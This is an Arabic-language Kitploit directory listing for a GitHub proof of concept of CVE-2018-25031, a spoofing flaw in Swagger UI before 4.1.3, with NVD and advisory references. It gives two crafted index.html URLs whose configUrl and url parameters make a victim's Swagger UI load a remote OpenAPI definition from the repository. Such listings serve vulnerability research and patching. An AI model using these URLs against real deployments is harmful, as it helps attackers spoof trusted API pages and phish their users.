Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-25031 — ملفات .json و.yaml تُستخدم لاستغلال CVE-2018-25031 | Kitploit
أدوات/GitHubGitHub/afine-com/cve-2018-25031
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبأمن واجهات برمجة التطبيقات
GitHubafine-com/cve-2018-25031

CVE-2018-25031

ملفات .json و.yaml تُستخدم لاستغلال CVE-2018-25031

عرض المستودع
211منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-25031

الوصف:

قد تسمح Swagger UI قبل الإصدار 4.1.3 لمهاجم عن بعد بتنفيذ هجمات التزوير. من خلال إقناع الضحية بفتح عنوان URL مُصمم، يمكن للمهاجم استغلال هذه الثغرة لعرض تعريفات OpenAPI عن بعد.


لقطة شاشة قبل الهجوم:

PoC:

root@kitploit:~
/index.html?configUrl=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
/index.html?url=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json

لقطة شاشة PoC بعد الهجوم:

المراجع:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2

تم الاختبار على Swagger UI 3.52.1
تنزيل الأداة